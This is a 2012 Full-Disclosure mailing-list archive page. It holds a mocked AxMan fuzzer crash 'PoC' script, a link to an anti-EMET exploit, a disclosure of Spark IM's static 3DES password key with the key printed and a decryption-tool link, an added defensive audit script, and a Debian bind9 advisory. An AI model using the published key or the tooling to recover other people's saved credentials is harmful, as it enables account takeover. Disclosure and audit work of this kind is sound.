[Full-disclosure] Comments group
nice infographics: http://go.bloomberg.com/multimedia/china-hackers-activity-logged-reveals-multiple-victims-worldwide/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
In which case I would like his follow-up email read both on my wedding night and funeral (hopefully different nights).

Sent using BlackBerry® from Orange

-----Original Message-----
From: Thor
Date: Tue, 31 Jul 2012 10:09:06
To:
Cc: kaveh ghaemmaghami; ;
Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

Nope. He's serious. We had an offline discussion (if you want to call it that) where he maintains it is a problem and that other people "appreciate" it.

t

On Jul 31, 2012, at 9:25 AM, James Condron wrote:
> It's a piss take. Of course it's a piss take.
>
> Sent using BlackBerry® from Orange
>
> [remainder of the quoted thread trimmed: kaveh ghaemmaghami's reply and the original PoC post appear in full in the posts below]
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
Nope. He's serious. We had an offline discussion (if you want to call it that) where he maintains it is a problem and that other people "appreciate" it.

t

On Jul 31, 2012, at 9:25 AM, James Condron wrote:
> It's a piss take. Of course it's a piss take.
>
> Sent using BlackBerry® from Orange
>
> [remainder of the quoted thread trimmed: kaveh ghaemmaghami's reply and the original PoC post appear in full in the posts below]
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
It's a piss take. Of course it's a piss take.

Sent using BlackBerry® from Orange

-----Original Message-----
From: kaveh ghaemmaghami
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sun, 29 Jul 2012 15:08:44
To:
Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

I think you're on vacation now, aren't you? Plus nobody asked you to read my post and I am not interested in your opinion; keep it for yourself.

On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami wrote:
> [original PoC post quoted in full; it appears unquoted in HD Moore's reply below]
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
In other news, running local commands grants code execution :)

I am surprised you didn't allocate a CVE,

-HD

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of kaveh ghaemmaghami
Sent: Saturday, July 28, 2012 7:21 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
Crash : http://imageshack.us/f/217/axman.jpg/
Date: July 28, 2012
Author: coolkaveh
coolka...@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://digitaloffense.net/tools/axman/
version : 1.0.0
Tested on: windows 7 SP1

Crash The Exploiter
Lame HD Moore fuzzer Memory Corruption
By Awsome coolkaveh

---

import os
import win32api
crash = " Crash The Exploiter "
lame="Lame HD Moore fuzzer Memory corruption "
awsome=" By Awsome coolkaveh "
print
print
print
print crash
print
print lame
print
print awsome
print
print
print
print
exploit = ("\x90" *800)
win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
[Full-disclosure] anti emet3.5
The exploit was written in 2009: anti DEP+ASLR and anti anti-ROP.
http://hi.baidu.com/yuange1975/blog/item/b7de7ed35f94d9fea9ec9a86.html
Re: [Full-disclosure] Security Problem with Google’s 2-Step Authentication
This is quite common. Further, please post your discovery on the list.

On Mon, 30 Jul 2012 11:41:52 -0300, Pablo Ximenes wrote:
> Hi Folks,
>
> I'd like to share with you one of my findings that failed to get Google's Security Reward. Although Google doesn't consider it a security problem, some might find it at least amusing if not interesting.
>
> Check it out: http://ximen.es/?p=653
>
> Sorry for typos, cross posting, and lack of accuracy.
>
> Regards,
>
> Pablo Ximenes
[Full-disclosure] Spark IM Client Local Password Decryption
The open source Spark IM client from Ignite Realtime has a feature that can save the user's password; this password is stored insecurely due to the use of a static encryption key.

The password is stored in a file called "spark.properties" and is encrypted with Triple DES in ECB mode. The problem is that the key used to encrypt it is static (see source file "Encryptor.java"), thus all users of the application share a single key to 'protect' their password. Because of this, it's trivial to write a tool to scan for and decrypt these passwords.

The Base64 encoded key is: ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae

I've written a simple tool (link below) that will scan a system (Windows only) and provide a list of recovered user names and passwords; to simplify auditing, it can also scan remote systems by using the administrative share. To perform this scan, the attacker needs to have access to the user's profile directory, either via local administrator privileges or misconfigured permissions.

Spark is often used with the Openfire jabber server (also from Ignite Realtime) as an internal IM solution, and can be configured to use LDAP for authentication, which makes the recovered credentials far more interesting.

As of the current version (2.6.3), there does not seem to be a way to disable this feature.

More details: http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/
Decryption Tool: https://github.com/adamcaudill/sparkim-passview
Spark: http://www.igniterealtime.org/projects/spark/

My apologies if this has been previously documented; in my research I was unable to find anything.
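An audit-side example added here, not the author's sparkim-passview tool and not Spark's own code: it parses constructed spark.properties files, flags profiles that carry a saved password whose Base64 blob is a whole number of 3DES blocks, and groups users whose blobs are byte-identical, which under one static key in ECB mode means identical passwords, all without decrypting anything. The property names (username, passwordSaved, password), the file paths and the blob values are assumptions.

```python
import base64
import re
from collections import defaultdict

# Constructed sample profiles (not from the post): the property names
# (username, passwordSaved, password) and the blob values are assumptions.
# Alice and Bob deliberately carry the same blob.
SAMPLE_PROFILES = {
    r"C:\Users\alice\AppData\Roaming\Spark\spark.properties":
        "#Spark Settings\nusername=alice\npasswordSaved=true\npassword=q2fA7mXqW3k=\n",
    r"C:\Users\bob\AppData\Roaming\Spark\spark.properties":
        "username=bob\npasswordSaved=true\npassword=q2fA7mXqW3k=\n",
    r"C:\Users\carol\AppData\Roaming\Spark\spark.properties":
        "username=carol\npasswordSaved=false\n",
}

def parse_properties(text):
    """Minimal Java .properties parser: '#'/'!' comments, key=value or key: value."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2)
    return props

def audit(profiles):
    """Return (findings, shared): findings maps path -> (username, blob shape);
    shared lists groups of users whose blobs are byte-identical. ECB under one
    static key is deterministic, so identical ciphertext means identical password."""
    findings, by_blob = {}, defaultdict(list)
    for path, text in profiles.items():
        p = parse_properties(text)
        blob = p.get("password")
        if not blob:
            continue  # nothing saved in this profile
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            findings[path] = (p.get("username"), "unparseable")
            continue
        # 3DES is an 8-byte block cipher, so an ECB blob is a multiple of 8 bytes
        shape = "3des-block-multiple" if raw and len(raw) % 8 == 0 else "unexpected-length"
        findings[path] = (p.get("username"), shape)
        by_blob[raw].append(p.get("username"))
    shared = sorted(sorted(users) for users in by_blob.values() if len(users) > 1)
    return findings, shared
```

Pointing this at real profile directories only requires replacing the constructed dict with files read from disk; the shared-blob groups are the quickest way to spot reused or default passwords during an audit.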
[Full-disclosure] [SECURITY] [DSA 2517-1] bind9 security update
Debian Security Advisory DSA-2517-1                   secur...@debian.org
http://www.debian.org/security/                                Nico Golde
July 30, 2012                          http://www.debian.org/security/faq

Package        : bind9
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-3817

Einar Lonn discovered that under certain conditions bind9, a DNS server, may use cached data before initialization. As a result, an attacker can trigger an assertion failure on servers under high query load that do DNSSEC validation.

For the stable distribution (squeeze), this problem has been fixed in version 1:9.7.3.dfsg-1~squeeze6.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in version 1:9.8.1.dfsg.P1-4.2.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org